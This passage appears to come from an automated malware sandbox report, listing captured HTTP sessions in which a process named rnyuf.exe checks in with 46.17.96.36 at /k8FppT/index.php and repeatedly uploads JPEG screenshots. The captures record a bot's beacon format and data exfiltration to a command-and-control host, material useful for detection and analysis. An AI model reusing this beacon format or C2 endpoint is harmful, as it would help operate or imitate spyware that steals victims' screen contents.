                                        Date: Sun, 29 Aug 2021 20:27:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        65192.168.2.44980346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:40.733958006 CEST8174OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:40.805799961 CEST8174INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        66192.168.2.44980446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:40.956150055 CEST8175OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9
                                        Host: 46.17.96.36
                                        Content-Length: 110607
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:40.956264019 CEST8175OUTData Raw: 2d 2d 2d 2d 2d 2d 63 65 35 31 62 38 35 62 34 66 39 61 65 39 61 33 63 34 36 30 34 63 37 32 65 32 65 31 63 34 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------ce51b85b4f9ae9a3c4604c72e2e1c4b9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:40.956473112 CEST8185OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:40.956850052 CEST8188OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:40.993031025 CEST8191OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:40.993086100 CEST8208OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:40.993211031 CEST8213OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:41.028354883 CEST8216OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:41.028386116 CEST8224OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:41.028503895 CEST8243OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:41.028528929 CEST8253OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:27:41.135195017 CEST8286INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0
                                        Aug 29, 2021 22:27:41.143050909 CEST8286OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:41.221348047 CEST8286INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        67192.168.2.44980546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:40.957469940 CEST8188OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:41.029601097 CEST8264INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        68192.168.2.44980646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:41.436784983 CEST8287OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:41.511917114 CEST8326INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        69192.168.2.44980746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:41.472390890 CEST8288OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----eae9700a714e425f73995764be569cb3
                                        Host: 46.17.96.36
                                        Content-Length: 110906
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:41.472394943 CEST8288OUTData Raw: 2d 2d 2d 2d 2d 2d 65 61 65 39 37 30 30 61 37 31 34 65 34 32 35 66 37 33 39 39 35 37 36 34 62 65 35 36 39 63 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------eae9700a714e425f73995764be569cb3Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:41.472551107 CEST8298OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:41.472628117 CEST8301OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:41.505217075 CEST8309OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:41.505260944 CEST8314OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:41.505278111 CEST8317OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:41.506047964 CEST8321OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:41.506076097 CEST8326OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:41.538140059 CEST8329OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:41.538172960 CEST8337OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:41.642554998 CEST8400INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.44974246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:11.410922050 CEST1773OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:11.411566973 CEST1773OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:11.412080050 CEST1783OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:11.412585020 CEST1785OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:11.444426060 CEST1794OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:11.444463968 CEST1799OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:11.444484949 CEST1806OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:11.444883108 CEST1811OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:11.477122068 CEST1824OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:11.477191925 CEST1851OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:11.477492094 CEST1861OUTData Raw: bf f6 fc cc d5 f1 9f 86 ed e0 85 56 ec c7 19 dc ab 18 b5 94 18 c2 05 2d b9 76 e5 00 0c a7 2c 00 c1 15 7e cf c4 3a 66 a1 a9 4d 61 69 3b cd 3c 3f 7c ac 0f e5 8e 01 c7 99 b7 61 38 60 78 3d eb 99 b8 f0 5d fd b5 cd ad ce 99 73 14 f7 06 19 e3 bb 9e fe
                                        Data Ascii: V-v,~:fMai;<?|a8`x=]sBYW(~^?vu,V>,Gw<h9[?i**0=WB6i_t<Aq=i(-(0KIK@Q-:J*ALQIE
                                        Aug 29, 2021 22:27:11.580934048 CEST1880INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        70192.168.2.44980846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:41.665491104 CEST8401OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:41.739428043 CEST8401INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
